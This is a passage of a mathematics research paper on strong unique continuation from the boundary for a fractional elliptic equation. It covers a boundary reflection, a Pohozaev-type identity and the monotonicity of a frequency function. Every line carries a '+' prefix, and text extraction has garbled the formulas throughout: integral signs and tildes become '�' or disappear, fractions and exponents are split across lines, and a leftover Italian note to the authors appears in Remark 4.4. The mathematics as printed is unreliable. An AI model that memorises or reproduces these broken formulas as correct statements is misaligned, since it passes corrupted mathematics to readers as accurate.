+ r0) in view of (36). If U ∈ H1
863
+ 0,L(CΩ, t1−2s) solves (17), then the function
864
+ (38)
865
+ W = U ◦ F ∈ H1(Qr0, t1−2s)
866
+ is a weak solution to
867
+ (39)
868
+
869
+ div(t1−2sA∇W) = 0,
870
+ in Qr0,
871
+ − limt→0+ t1−2sα ∂W
872
+ ∂t = κs,N¯hW,
873
+ on Q′
874
+ r0,
875
+ where Q′
876
+ r := {(y′, yN) ∈ B′
877
+ r : yN < 0} for all r > 0, A = A(y) is the (N +1)×(N +1) matrix-valued
878
+ function given by
879
+ A(y) := (JF (y))−1(JF (y)−1)T |detJF (y)|,
880
+ and
881
+ (40)
882
+ ¯h(y) = α(y)h(F(y, 0)).
883
+ As observed in [9, Section 2], A has C0,1 entries
884
+
885
+ aij
886
+ �N+1
887
+ i,j=1 and can be written as
888
+ (41)
889
+ A(y) = A(y′, yN) =
890
+ � D(y′, yN)
891
+ 0
892
+ 0
893
+ α(y′, yN)
894
+
895
+ ,
896
+ with
897
+ (42)
898
+ D(y′, yN) =
899
+ � IdN−1 +O(|y′|2) + O(yN)
900
+ O(yN)
901
+ O(yN)
902
+ 1 + O(|y′|2) + O(yN)
903
+
904
+ ,
905
+ where IdN−1 is the identity (N −1)×(N −1) matrix, O(yN) and O(|y′|2) denote blocks of matrices
906
+ with all elements being O(yN) as yN → 0 and O(|y′|2) as |y′| → 0 respectively. In particular, in
907
+ view of (41)-(42) we have that
908
+ (43)
909
+ aNj(y′, 0) = ajN(y′, 0) = 0
910
+ for all j = 1, . . . , N − 1.
911
+
912
+ 10
913
+ ALESSANDRA DE LUCA, VERONICA FELLI, AND GIOVANNI SICLARI
914
+ Having in mind to reflect our problem through the hyperplane yN = 0, we define
915
+ �A(y′, yN) :=
916
+
917
+ A(y′, yN),
918
+ if yN ≤ 0,
919
+ MNA(y′, −yN)MN,
920
+ if yN > 0,
921
+ (44)
922
+ �D(y′, yN) :=
923
+
924
+ D(y′, yN),
925
+ if yN ≤ 0,
926
+ M ′
927
+ ND(y′, −yN)M ′
928
+ N,
929
+ if yN > 0,
930
+ (45)
931
+ with MN, M ′
932
+ N as in (34), and
933
+ (46)
934
+ �α(y′, yN) :=
935
+
936
+ α(y′, yN),
937
+ if yN ≤ 0,
938
+ α(y′, −yN),
939
+ if yN > 0,
940
+ where α(y) = det JF (y). We observe that the Lipschitz continuity of A and (43) imply that the
941
+ entries of �A are of class C0,1. Furthermore, �A is symmetric and, possibly choosing r0 smaller from
942
+ the beginning,
943
+ (47)
944
+ ∥ �A(y)∥L(RN+1,RN+1) ≤ 2
945
+ and
946
+ 1
947
+ 2|z|2 ≤ �A(y)z · z ≤ 2|z|2
948
+ for all z ∈ RN+1, y ∈ B′r0,
949
+ where ∥·∥L(RN+1,RN+1) denotes the operator norm on the space of bounded linear operators from
950
+ RN+1 into itself. We also observe that (41)-(42) imply the expansion
951
+ (48)
952
+ �A(y) = IdN+1 +O(|y|)
953
+ as |y| → 0+.
954
+ Letting �A and �D be as in (44)-(45), we define
955
+ (49)
956
+ µ(z) :=
957
+ �A(y)z · z
958
+ |z|2
959
+ and
960
+ β(z) :=
961
+ �A(y)z
962
+ µ(z)
963
+ for every z = (y, t) ∈ B+
964
+ r0 \ {0},
965
+ and
966
+ (50)
967
+ β′(y) :=
968
+ �D(y)y
969
+ µ(y, 0)
970
+ for every y ∈ B′r0.
971
+ For every z = (z1, . . . , zN+1) ∈ RN+1 and y ∈ B′r0, d �A(y)zz is defined as the vector of RN+1 with
972
+ i-th component given by
973
+ (51)
974
+ (d �A(y)zz)i =
975
+ N+1
976
+
977
+ h,k=1
978
+ ∂�akh
979
+ ∂zi
980
+ (y)zhzk,
981
+ i = 1, · · · , N + 1,
982
+ where (�ak,h)N+1
983
+ k,h=1 are the entries of the matrix �A = in (44).
984
+ Proposition 3.2. Let µ, β, and β′ be as in (49)-(50). Then, possibly choosing r0 smaller from
985
+ the beginning, we have that
986
+ 1
987
+ 2 ≤ µ(z) ≤ 2
988
+ for any z ∈ B+
989
+ r0 \ {0},
990
+ (52)
991
+ µ(z) = 1 + O(|z|),
992
+ ∇µ(z) = O(1)
993
+ as |z| → 0+.
994
+ (53)
995
+ Moreover β and β′ are well-defined and
996
+ β(z) = z + O(|z|2) = O(|z|)
997
+ as |z| → 0+,
998
+ (54)
999
+ Jβ(z) = �A(y) + O(|z|) = IdN+1 +O(|z|),
1000
+ div(β)(z) = N + 1 + O(|z|)
1001
+ as |z| → 0+,
1002
+ (55)
1003
+ β′(y) = y + O(|y|2) = O(|y|),
1004
+ div(β′)(y) = N + O(|y|)
1005
+ as |y| → 0+, .
1006
+ (56)
1007
+ Proof. (52) easily follows from (47). We refer to [9, Lemma 2.1] for the proof of (53). As a direct
1008
+ consequence, β and β′ are well-defined. From (54) and (55), whose proof is contained in [9, Lemma
1009
+ 2.2], we derive (56), after noting that β′ coincides with the first N-components of the vector β.
1010
+
1011
+
1012
+ STRONG UNIQUE CONTINUATION FROM THE BOUNDARY
1013
+ 11
1014
+ Remark 3.3. From the Lipschitz continuity of �A observed above and Proposition 3.2 we have
1015
+ that
1016
+ �A ∈ C0,1(B+
1017
+ r0, R(N+1)2), µ ∈ C0,1(B+
1018
+ r0), 1
1019
+ µ ∈ C0,1(B+
1020
+ r0), β ∈ C0,1(B+
1021
+ r0, RN+1)
1022
+ (57)
1023
+ Jβ ∈ L∞(B+
1024
+ r0, R(N+1)2), div(β) ∈ L∞(B+
1025
+ r0), β′ ∈ L∞(B′r0, RN), div(β′) ∈ L∞(B′r0).
1026
+ Remark 3.4. If v ∈ H1
1027
+ 0,L(CΩ, t1−2s), then (v ◦ F)|Qr0 ∈ H1(Qr0, t1−2s) by Proposition 3.1, and
1028
+ (58)
1029
+ (v ◦ F)(z) = 0
1030
+ for any z ∈ {(y′, yN, t) ∈ B+
1031
+ r0 : yN = 0}
1032
+ in view of (35). Equality (58) is meant in the sense of the classical theory of traces for Sobolev
1033
+ spaces; this is possible thanks to the fact that H1(E, t1−2s) ⊂ W 1,1(E) for any bounded open set
1034
+ E ⊆ RN × (0, ∞).
1035
+ If W is a solution to (39), let �
1036
+ W be defined as follows
1037
+
1038
+ W(y′, yN, t) :=
1039
+
1040
+ W(y′, yN, t),
1041
+ if (y′, yN, t) ∈ Qr0,
1042
+ −W(y′, −yN, t),
1043
+ if (y′, yN, t) ∈ B+
1044
+ r0 and yN > 0.
1045
+ (59)
1046
+ For the sake of convenience we will still denote �
1047
+ W with W. Letting ¯h be defined in (40), we also
1048
+ consider the following function
1049
+ (60)
1050
+ �h(y′, yN) :=
1051
+ �¯h(y′, yN),
1052
+ if (y′, yN) ∈ Q′
1053
+ r0,
1054
+ ¯h(y′, −yN),
1055
+ if (y′, yN) ∈ B′
1056
+ r0, and yN > 0.
1057
+ It is easy to verify that W ∈ H1(B+
1058
+ r0, t1−2s) thanks to Remark 3.4 and
1059
+ (61)
1060
+ �h ∈ W 1, N
1061
+ 2s +ε(B′
1062
+ r0)
1063
+ thanks to (7), (40) and Proposition 3.1. Furthermore W weakly solves
1064
+ (62)
1065
+
1066
+ div(t1−2s �A∇W) = 0,
1067
+ on B+
1068
+ r0,
1069
+ − limt→0+ t1−2s�α ∂W
1070
+ ∂t = κs,N�h Tr(W),
1071
+ on B′
1072
+ r0,
1073
+ with �α defined in (46), �h in (60) and �A in (44), namely
1074
+ (63)
1075
+
1076
+ B+
1077
+ r0
1078
+ t1−2s �A∇W · ∇φ dz = κs,N
1079
+
1080
+ B′r0
1081
+ �h Tr(W) Tr(φ) dy
1082
+ for all φ ∈ H1
1083
+ 0,S+
1084
+ r0(B+
1085
+ r1, t1−2s).
1086
+ Thanks to Proposition 2.2, (61) and the H¨older inequality, the second member of (63) is well-
1087
+ defined.
1088
+ Remark 3.5. In [12, Theorem 2.1] it is proved that, if W ∈ H1(B+
1089
+ r0, t1−2s) is a weak solution to
1090
+ (63) with �A and �h satisfying (41), (44), (57), (52), (61), then
1091
+ (64)
1092
+ ∇xW ∈ H1(B+
1093
+ r , t1−2s)
1094
+ and
1095
+ t1−2s ∂W
1096
+ ∂t ∈ H1(B+
1097
+ r , t2s−1)
1098
+ for all r ∈ (0, r0). Furthermore
1099
+ ∥∇xW∥H1(B+
1100
+ r ,t1−2s) +
1101
+ ����t1−2s ∂W
1102
+ ∂t
1103
+ ����
1104
+ H1(B+
1105
+ r ,t2s−1)
1106
+ ≤ C ∥W∥H1(B+
1107
+ r0 ,t1−2s)
1108
+ for a positive constant C > 0 depending only on N, s, r, r0, ∥�h∥W 1, N
1109
+ 2s (B′
1110
+ r0), ∥ �A∥W 1,∞(B+
1111
+ r0 ,R(N+1)2)
1112
+ (but independent of W).
1113
+ Remark 3.6. If W ∈ H1(B+
1114
+ r0, t1−2s) is a weak solution to (63), the regularity result (64) and
1115
+ (28) ensure that, for all φ ∈ H1(B+
1116
+ r0, t1−2s) and r ∈ (0, r0), t1−2s Tr1( �D∇xW · x) Tr1 φ ∈ L1(S+
1117
+ r );
1118
+ moreover the function
1119
+ r �→
1120
+
1121
+ S+
1122
+ r
1123
+ t1−2s( �D∇xW · x)φ dS
1124
+
1125
+ 12
1126
+ ALESSANDRA DE LUCA, VERONICA FELLI, AND GIOVANNI SICLARI
1127
+ is continuous in (0, r0). Furthermore, since t1−2s ∂W
1128
+ ∂t ∈ H1(B+
1129
+ r , t2s−1) for all r ∈ (0, r0) by (64),
1130
+ we also have that, for all φ ∈ H1(B+
1131
+ r0, t1−2s) and r ∈ (0, r0), t1−2s�α ∂W
1132
+ ∂t tφ ∈ W 1,1(B+
1133
+ r ), so that
1134
+ Tr1(t1−2s�α ∂W
1135
+ ∂t tφ) ∈ L1(S+
1136
+ r ); moreover the function
1137
+ r �→
1138
+
1139
+ S+
1140
+ r
1141
+ t1−2s�α∂W
1142
+ ∂t tφ dS
1143
+ is continuous in (0, r0). We conclude that, for all φ ∈ H1(B+
1144
+ r0, t1−2s), the function
1145
+ t1−2s( �A∇W · z)φ = t1−2s( �D∇xW · x)φ + t1−2s�α∂W
1146
+ ∂t tφ
1147
+ has a trace on S+
1148
+ r for all r ∈ (0, r0) and the function
1149
+ r �→
1150
+
1151
+ S+
1152
+ r
1153
+ t1−2s( �A∇W · z)φ dS
1154
+ is continuous in (0, r0).
1155
+ The following result provides an integration by parts formula which will be useful in Section 5.
1156
+ Proposition 3.7. Let W be a weak solution to (62). For all r ∈ (0, r0) and φ ∈ H1(B+
1157
+ r0, t1−2s)
1158
+ (65)
1159
+
1160
+ B+
1161
+ r
1162
+ t1−2s �A∇W · ∇φ dz = 1
1163
+ r
1164
+
1165
+ S+
1166
+ r
1167
+ t1−2s( �A∇W · z)φ dS + κs,N
1168
+
1169
+ B′r
1170
+ �h Tr(W) Tr(φ) dx.
1171
+ Proof. By density it is enough to prove (65) for φ ∈ C∞(B+
1172
+ r0). Let r ∈ (0, r0). For every n ∈ N,
1173
+ let
1174
+ ηn(z) :=
1175
+
1176
+
1177
+
1178
+
1179
+
1180
+ 1,
1181
+ if
1182
+ 0 ≤ |z| ≤ r − 1
1183
+ n,
1184
+ n(r − |z|),
1185
+ if
1186
+ r − 1
1187
+ n ≤ |z| ≤ r,
1188
+ 0,
1189
+ if
1190
+ |z| ≥ r.
1191
+ Testing (63) with φηn and passing to the limit as n → ∞, we obtain (65) thanks to the integral
1192
+ mean value theorem and Remark 3.6.
1193
+
1194
+ Remark 3.8. For all r ∈ (0, r0] and any v ∈ H1(B+
1195
+ r , t1−2s), thanks to (30), (47) and (52),
1196
+
1197
+ B+
1198
+ r
1199
+ t1−2s|∇v|2 dz ≤ 2
1200
+
1201
+ B+
1202
+ r
1203
+ t1−2s �A∇v · ∇v dz − 2κN,s
1204
+
1205
+ B′r
1206
+ �h| Tr(v)|2 dx
1207
+ + 2κN,sη˜h(r)
1208
+ ��
1209
+ B+
1210
+ r
1211
+ t1−2s|∇v|2 dz + N − 2s
1212
+ r
1213
+
1214
+ S+
1215
+ r
1216
+ t1−2sµv2 dS
1217
+
1218
+ .
1219
+ Therefore, if η˜h(r) <
1220
+ 1
1221
+ 2κN,s ,
1222
+ (66)
1223
+
1224
+ B+
1225
+ r
1226
+ t1−2s|∇v|2 dz ≤
1227
+ 2
1228
+ 1 − 2κN,sη˜h(r)
1229
+ ��
1230
+ B+
1231
+ r
1232
+ t1−2s �A∇v · ∇v dz − κN,s
1233
+
1234
+ B′r
1235
+ �h| Tr(v)|2 dx
1236
+
1237
+ + 2(N − 2s)κN,sη˜h(r)
1238
+ (1 − 2κN,sη˜h(r))r
1239
+
1240
+ S+
1241
+ r
1242
+ t1−2sµv2 dS.
1243
+ 4. The Monotonicity Formula
1244
+ Let W be a non trivial weak solution of (62). For any r ∈ (0, r0] we define the height function
1245
+ and the energy function as
1246
+ H(r) :=
1247
+ 1
1248
+ rN+1−2s
1249
+
1250
+ S+
1251
+ r
1252
+ t1−2sµW 2 dS,
1253
+ (67)
1254
+ D(r) :=
1255
+ 1
1256
+ rN−2s
1257
+ ��
1258
+ B+
1259
+ r
1260
+ t1−2s �A∇W · ∇W dz − κN,s
1261
+
1262
+ B′r
1263
+ �h| Tr W|2 dx
1264
+
1265
+ ,
1266
+ (68)
1267
+
1268
+ STRONG UNIQUE CONTINUATION FROM THE BOUNDARY
1269
+ 13
1270
+ respectively. Eventually choosing r0 smaller from the beginning, we may assume that
1271
+ (69)
1272
+ η˜h(r) <
1273
+ 1
1274
+ 4κN,s
1275
+ for all r ∈ (0, r0],
1276
+ so that (66) holds for every r ∈ (0, r0].
1277
+ Proposition 4.1. Let H and D be as in (67) and (68). Then H ∈ W 1,1
1278
+ loc ((0, r0]) and
1279
+ (70)
1280
+ H′(r) =
1281
+ 2
1282
+ rN+1−2s
1283
+
1284
+ S+
1285
+ r
1286
+ t1−2sµW ∂W
1287
+ ∂ν dS + H(r)O(1)
1288
+ as r → 0+
1289
+ in the sense of distributions and almost everywhere, where ν is the outer normal vector to B+
1290
+ r on
1291
+ S+
1292
+ r , i.e. ν(z) :=
1293
+ z
1294
+ |z|. Moreover, we have that almost everywhere
1295
+ (71)
1296
+ H′(r) =
1297
+ 2
1298
+ rN+1−2s
1299
+
1300
+ S+
1301
+ r
1302
+ t1−2s( �A∇W · ν)W dS + H(r)O(1)
1303
+ as r → 0+
1304
+ and
1305
+ (72)
1306
+ H′(r) = 2
1307
+ r D(r) + H(r)O(1)
1308
+ as r → 0+.
1309
+ Proof. The proof is similar to that of [9, Lemma 3.1] thus we omit it.
1310
+
1311
+ Proposition 4.2. We have that H(r) > 0 for every r ∈ (0, r0].
1312
+ Proof. Let us assume by contradiction that there exists r ∈ (0, r0] such that H(r) = 0. Then,
1313
+ from (67) and (52) we deduce that W ≡ 0 on S+
1314
+ r . Thus we can test (63) with W, obtaining that
1315
+ 0 =
1316
+
1317
+ B+
1318
+ r
1319
+ t1−2s �A∇W · ∇W dz − κN,s
1320
+
1321
+ B′r
1322
+ �h| Tr(W)|2 dx
1323
+
1324
+ �1
1325
+ 2 − κN,sη˜h(r)
1326
+
1327
+ ∥∇W∥2
1328
+ L2(B+
1329
+ r ,t1−2s) ,
1330
+ thanks to (66). Then, by (69) we can conclude that W ≡ 0 on B+
1331
+ r ; this implies that W ≡ 0 on
1332
+ B+
1333
+ r0 by classical unique continuation principles for second order elliptic operators with Lipschitz
1334
+ coefficients (see e.g. [13]), giving rise to a contradiction.
1335
+
1336
+ The following proposition contains a Pohozaev-type identity for problem (62). For its proof
1337
+ we refer to [12, Proposition 2.3], where a more general version is established exploiting some
1338
+ Sobolev-type regularity results.
1339
+ Proposition 4.3. [12, Proposition 2.3] Let W be a weak solution to equation (62). Then, for a.e.
1340
+ r ∈ (0, r0),
1341
+
1342
+ S+
1343
+ r
1344
+ t1−2s �A∇W · ∇W dS − κN,s
1345
+
1346
+ S′r
1347
+ �h| Tr(W)|2 dS′
1348
+ (73)
1349
+ = 2
1350
+
1351
+ S+
1352
+ r
1353
+ t1−2s | �A∇W · ν|2
1354
+ µ
1355
+ dS − κN,s
1356
+ r
1357
+
1358
+ B′r
1359
+ (divy(β′)�h + β′ · ∇�h)| Tr(W)|2 dy
1360
+ + 1
1361
+ r
1362
+
1363
+ B+
1364
+ r
1365
+ t1−2s �A∇W · ∇W div(β) dz − 2
1366
+ r
1367
+
1368
+ B+
1369
+ r
1370
+ t1−2sJβ( �A∇W) · ∇W dz
1371
+ + 1
1372
+ r
1373
+
1374
+ B+
1375
+ r
1376
+ t1−2s(d �A ∇W ∇W) · β dz + 1 − 2s
1377
+ r
1378
+
1379
+ B+
1380
+ r
1381
+ t1−2s �α
1382
+ µ
1383
+ �A∇W · ∇W dz,
1384
+ where µ and β are defined in (49), �α in (46), β′ in (50), ν is the outer normal vector to B+
1385
+ r on
1386
+ S+
1387
+ r , i.e. ν(z) =
1388
+ z
1389
+ |z|, and dS′ denotes the volume element on (N − 1)-dimensional spheres.
1390
+ Remark 4.4. As in Remark 3.6, by the Coarea Formula we have that
1391
+
1392
+ B′
1393
+ r0
1394
+ |�h|| Tr(W)|2 dx =
1395
+ � r0
1396
+ 0
1397
+ ��
1398
+ S′
1399
+ ρ
1400
+ |�h|| Tr(W)|2 dS′
1401
+
1402
+ dρ,
1403
+
1404
+ 14
1405
+ ALESSANDRA DE LUCA, VERONICA FELLI, AND GIOVANNI SICLARI
1406
+ S′
1407
+ ρ era gi`a stata definita hence ρ →
1408
+
1409
+ S′ρ
1410
+ �h| Tr(W)|2 dS′ is a well-defined L1(0, r0)-function, as a
1411
+ consequence of (61), (29) and the H¨older inequality.
1412
+ Proposition 4.5. Let D be as in (68). Then D ∈ W 1,1
1413
+ loc ((0, r0]) and
1414
+ (74)
1415
+ D′(r) = 2r2s−N
1416
+
1417
+ S+
1418
+ r
1419
+ t1−2s | �A∇W · ν|2
1420
+ µ
1421
+ dS + O
1422
+
1423
+ r−1+
1424
+ 4s2ε
1425
+ N+2sε
1426
+ � �
1427
+ D(r) + N − 2s
1428
+ 2
1429
+ H(r)
1430
+
1431
+ as r → 0+, in the sense of distributions and almost everywhere.
1432
+ Proof. By the Coarea Formula D ∈ W 1,1
1433
+ loc ((0, r0]) and
1434
+ (75)
1435
+ D′(r) = (2s − N)r2s−N−1
1436
+ ��
1437
+ B+
1438
+ r
1439
+ t1−2s �A∇W · ∇W dz − κN,s
1440
+
1441
+ B′r
1442
+ �h| Tr(W)|2 dx
1443
+
1444
+ + r2s−N
1445
+ ��
1446
+ S+
1447
+ r
1448
+ t1−2s �A∇W · ∇W dS − κN,s
1449
+
1450
+ S′r
1451
+ �h| Tr(W)|2 dS′
1452
+
1453
+ a.e. and in the sense of distributions in (0, r0). Using (73) to estimate the second term on the
1454
+ right hand side of (75), we have that, for a.e. r ∈ (0, r0),
1455
+ D′(r) = (2s − N)r2s−N−1
1456
+ ��
1457
+ B+
1458
+ r
1459
+ t1−2s �A∇W · ∇W dz − κN,s
1460
+
1461
+ B′
1462
+ r
1463
+ �h| Tr(W)|2 dx
1464
+
1465
+ (76)
1466
+ + r2s−N
1467
+
1468
+ 2
1469
+
1470
+ S+
1471
+ r
1472
+ t1−2s | �A∇W · ν|2
1473
+ µ
1474
+ dS − κN,s
1475
+ r
1476
+
1477
+ B′r
1478
+ (divy(β′)�h + β′ · ∇�h)| Tr(W)|2 dy
1479
+
1480
+ + r2s−N
1481
+ �1
1482
+ r
1483
+
1484
+ B+
1485
+ r
1486
+ t1−2s �A∇W · ∇W div(β) dz − 2
1487
+ r
1488
+
1489
+ B+
1490
+ r
1491
+ t1−2sJβ( �A∇W) · ∇W dz
1492
+
1493
+ + r2s−N
1494
+ �1
1495
+ r
1496
+
1497
+ B+
1498
+ r
1499
+ t1−2s(d �A∇W∇W) · β dz + 1 − 2s
1500
+ r
1501
+
1502
+ B+
1503
+ r
1504
+ t1−2s �α
1505
+ µ
1506
+ �A∇W · ∇W dz
1507
+
1508
+ .
1509
+ Furthermore, thanks to point ii) of Proposition 3.1, (46), (47), (52), (53), (54), (55), and (66), we
1510
+ deduce that
1511
+ r2s−N−1
1512
+
1513
+ B+
1514
+ r
1515
+ t1−2s ��
1516
+ 2s − N + div(β) + (1 − 2s) �α
1517
+ µ
1518
+
1519
+ �A∇W · ∇W − 2Jβ( �A∇W) · ∇W
1520
+
1521
+ dz
1522
+ (77)
1523
+ + r2s−N−1
1524
+
1525
+ B+
1526
+ r
1527
+ t1−2s(d �A ∇W ∇W) · β dz = O(r) r2s−N−1
1528
+
1529
+ B+
1530
+ r
1531
+ t1−2s|∇W|2 dz
1532
+ = O(1)
1533
+
1534
+ D(r) + N − 2s
1535
+ 2
1536
+ H(r)
1537
+
1538
+ as r → 0+,
1539
+ where we used also the fact that d �A ∇W ∇W = O(1)|∇W|2 as r → 0+ by (51) and (57).
1540
+ In addition, recalling that ˜h ∈ W 1, N
1541
+ 2s +ε(B′
1542
+ r1), from (30), (31), (57) and (66) it follows that
1543
+ (78)
1544
+ r2s−N−1
1545
+
1546
+ B′r
1547
+ [(2s − N + divy(β′))�h + β′ · ∇�h]| Tr(W)|2 dx
1548
+ = O
1549
+
1550
+ r−1+
1551
+ 4s2ε
1552
+ N+2sε
1553
+ � �
1554
+ D(r) + N − 2s
1555
+ 2
1556
+ H(r)
1557
+
1558
+ as r → 0+. Combining (76), (77) and (78), we obtain (74).
1559
+
1560
+ For every r ∈ (0, r0] we define the frequency function
1561
+ (79)
1562
+ N(r) := D(r)
1563
+ H(r).
1564
+ Definition (79) is well-posed thanks to Proposition 4.2.
1565
+
1566
+ STRONG UNIQUE CONTINUATION FROM THE BOUNDARY
1567
+ 15
1568
+ Proposition 4.6. We have that N ∈ W 1,1
1569
+ loc ((0, r0]) and
1570
+ (80)
1571
+ N(r) > −N − 2s
1572
+ 2
1573
+ for every r ∈ (0, r0].
1574
+ Furthermore, if ν(z) :=
1575
+ z
1576
+ |z| is the outer normal vector to B+
1577
+ r on S+
1578
+ r and
1579
+ V(r) := 2r
1580
+ ��
1581
+ S+
1582
+ r t1−2sµW 2 dS
1583
+ � ��
1584
+ S+
1585
+ r t1−2s |A∇W·ν|2
1586
+ µ
1587
+ dS
1588
+
1589
+
1590
+ ��
1591
+ S+
1592
+ r t1−2sWA∇W · ν dS
1593
+ �2
1594
+ ��
1595
+ S+
1596
+ r t1−2sµW 2 dS
1597
+ �2
1598
+ ,
1599
+ then
1600
+ (81)
1601
+ V(r) ≥ 0
1602
+ for a.e. r ∈ (0, r0)
1603
+ and, for a.e. r ∈ (0, r0),
1604
+ (82)
1605
+ N ′(r) − V(r) = O
1606
+
1607
+ r−1+
1608
+ 4s2ε
1609
+ N+2sε
1610
+ � �
1611
+ N(r) + N − 2s
1612
+ 2
1613
+
1614
+ as r → 0+.
1615
+ Proof. Since D ∈ W 1,1
1616
+ loc ((0, r0]) and 1
1617
+ H ∈ W 1,1
1618
+ loc ((0, r0]) by Proposition 4.1 and Proposition 4.2, then
1619
+ N ∈ W 1,1
1620
+ loc ((0, r0]). Furthermore we recall that (66) holds for every r ∈ (0, r1], thus
1621
+ (83)
1622
+ N(r) ≥ −κN,s(N − 2s)η˜h(r),
1623
+ for every r ∈ (0, r0] and, in virtue of this, (80) directly follows from (69). Moreover (81) is a
1624
+ consequence of the Cauchy-Schwarz inequality in L2(S+
1625
+ r , t1−2s).
1626
+ From (71), (72) and (74) we
1627
+ deduce that
1628
+ N ′(r) =D′(r)H(r) − D(r)H′(r)
1629
+ (H(r))2
1630
+ = D′(r)H(r) − r
1631
+ 2(H′(r))2 + O(r)H(r)H′(r)
1632
+ (H(r))2
1633
+ (84)
1634
+ =V(r) + O(r) + O(r−1+
1635
+ 4s2ε
1636
+ N+2sε )
1637
+
1638
+ N(r) + N − 2s
1639
+ 2
1640
+
1641
+ + O(r−N+2s)
1642
+ H(r)
1643
+
1644
+ S+
1645
+ r
1646
+ t1−2s(A∇W · ν)W dS
1647
+ as r → 0+. In order to deal with the last term in (84), we observe that, for a.e. r ∈ (0, r0),
1648
+
1649
+ S+
1650
+ r
1651
+ t1−2s(A∇W · ν)W dS = rN−2sD(r) + H(r)O(rN+1−2s)
1652
+ as r → 0+,
1653
+ in virtue of (71) and (72). Thus, substituting into (84), we conclude that
1654
+ N ′(r) = V(r) + O(r−1+
1655
+ 4s2ε
1656
+ N+2sε )
1657
+
1658
+ N(r) + N − 2s
1659
+ 2
1660
+
1661
+ as r → 0+,
1662
+ where we have used that
1663
+ 4s2ε
1664
+ N+2sε < 1 since ε ∈ (0, 1) and N > 2s.
1665
+ Estimate (82) is thereby
1666
+ proved.
1667
+
1668
+ Proposition 4.7. There exists a constant C > 0 such that, for every r ∈ (0, r0],
1669
+ (85)
1670
+ N(r) ≤ C.
1671
+ Proof. From (81) and (82) we deduce that there exists a constant c > 0 such that
1672
+ (86)
1673
+
1674
+ N(r) + N − 2s
1675
+ 2
1676
+ �′
1677
+ ≥ −c r−1+
1678
+ 4s2ε
1679
+ N+2sε
1680
+
1681
+ N(r) + N − 2s
1682
+ 2
1683
+
1684
+ for a.e. r ∈ (0, r1),
1685
+ for some r1 ∈ (0, r0) sufficiently small.
1686
+ Hence, thanks to (80), we are allowed to divide each
1687
+ member of (86) by N(r) + N−2s
1688
+ 2
1689
+ , obtaining that
1690
+
1691
+ log
1692
+
1693
+ N(r) + N − 2s
1694
+ 2
1695
+ ��′
1696
+ ≥ −c r−1+
1697
+ 4s2ε
1698
+ N+2sε
1699
+ for a.e. r ∈ (0, r1).
1700
+
1701
+ 16
1702
+ ALESSANDRA DE LUCA, VERONICA FELLI, AND GIOVANNI SICLARI
1703
+ Then, integrating over (r, r1) with r < r1, we have that
1704
+ N(r) ≤ −N − 2s
1705
+ 2
1706
+ + exp
1707
+
1708
+ c N + 2sε
1709
+ 4s2ε
1710
+ r
1711
+ 4s2ε
1712
+ N+2sε
1713
+ 1
1714
+ � �
1715
+ N(r1) + N − 2s
1716
+ 2
1717
+
1718
+ for every r ∈ (0, r1),
1719
+ which proves (85), taking into account the continuity of N in (0, r0].
1720
+
1721
+ Proposition 4.8. There exists the limit
1722
+ (87)
1723
+ γ := lim
1724
+ r→0+ N(r).
1725
+ Moreover γ is finite and γ ≥ 0.
1726
+ Proof. Combining (85) and (86), we infer that
1727
+ (88)
1728
+
1729
+ N(r) + N − 2s
1730
+ 2
1731
+ �′
1732
+ ≥ −c r−1+
1733
+ 4s2ε
1734
+ N+2sε
1735
+
1736
+ C + N − 2s
1737
+ 2
1738
+
1739
+ for a.e. r ∈ (0, r1), hence
1740
+ �N − 2s
1741
+ 2
1742
+ + N(r) + c
1743
+ �N − 2s
1744
+ 2
1745
+ + C
1746
+ � N + 2sε
1747
+ 4s2ε
1748
+ r
1749
+ 4s2ε
1750
+ N+2sε
1751
+ �′
1752
+ ≥ 0
1753
+ for a.e. r ∈ (0, r1).
1754
+ From this, it follows in particular that the limit γ in (87) exists. Moreover, by (80) and (85) γ is
1755
+ finite, whereas (83) implies that γ ≥ 0.
1756
+
1757
+ Proposition 4.9. There exist c0, ¯c > 0 and ¯r ∈ (0, r0) such that
1758
+ (89)
1759
+ H(r) ≤ c0 r2γ
1760
+ for all r ∈ (0, r0]
1761
+ and
1762
+ (90)
1763
+ H(Rr) ≤ R¯c H(r)
1764
+ for all R ≥ 1 and r ∈
1765
+
1766
+ 0, ¯r
1767
+ R
1768
+
1769
+ .
1770
+ Furthermore, for any σ > 0 there exists a constant cσ > 0 such that
1771
+ (91)
1772
+ H(r) ≥ cσr2γ+σ
1773
+ for all r ∈ (0, r0].
1774
+ Proof. By (87) we have that N(r) = γ + � r
1775
+ 0 N ′(t) dt; hence from (72) it follows that
1776
+ (92)
1777
+ H′(r)
1778
+ H(r) = 2
1779
+ r N(r) + O(1) = 2
1780
+ r
1781
+ � r
1782
+ 0
1783
+ N ′(t) dt + 2γ
1784
+ r + O(1).
1785
+ From (88) and up to choosing r1 smaller, it follows that, for a.e. r ∈ (0, r1),
1786
+ H′(r)
1787
+ H(r) ≥ −κr−1+
1788
+ 4s2ε
1789
+ N+2sε + 2γ
1790
+ r
1791
+ for some positive constant κ > 0. Then an integration over (r, r1) yields
1792
+ log
1793
+ �H(r1)
1794
+ H(r)
1795
+
1796
+ ≥ −κN + 2sε
1797
+ 4s2ε
1798
+
1799
+ r
1800
+ 4s2ε
1801
+ N+2sε
1802
+ 1
1803
+ − r
1804
+ 4s2ε
1805
+ N+2sε
1806
+
1807
+ + log
1808
+ �r1
1809
+ r
1810
+ �2γ
1811
+ and thus
1812
+ H(r) ≤ H(r1)
1813
+ r2γ
1814
+ 1
1815
+ exp
1816
+
1817
+ κN + 2sε
1818
+ 4s2ε
1819
+ r
1820
+ 4s2ε
1821
+ N+2sε
1822
+ 1
1823
+
1824
+ r2γ
1825
+ for all r ∈ (0, r1], thus implying (89) thanks to the continuity of H in (0, r0].
1826
+ To prove (90), we observe that (92) and (85) imply that, for some ¯r ∈ (0, r0) and ¯c > 0,
1827
+ H′(r)
1828
+ H(r) ≤ ¯c
1829
+ r
1830
+ for all r ∈ (0, ¯r),
1831
+ whose integration over (r, rR) directly gives (90).
1832
+ In view of Proposition 4.8, for any σ > 0 there exists rσ ∈ (0, r0] such that
1833
+ H′(r)
1834
+ H(r) = 2
1835
+ r N(r) + O(1) ≤ 2γ + σ
1836
+ r
1837
+ for all r ∈ (0, rσ].
1838
+ Integrating over (r, rσ) and recalling that H is continuous in (0, r0], we deduce (91).
1839
+
1840
+
1841
+ STRONG UNIQUE CONTINUATION FROM THE BOUNDARY
1842
+ 17
1843
+ Proposition 4.10. There exists the limit limr→0+ r−2γH(r) and it is finite.
1844
+ Proof. By (89) it is sufficient to show that the limit does exist. In view of (72) we have that
1845
+ �H(r)
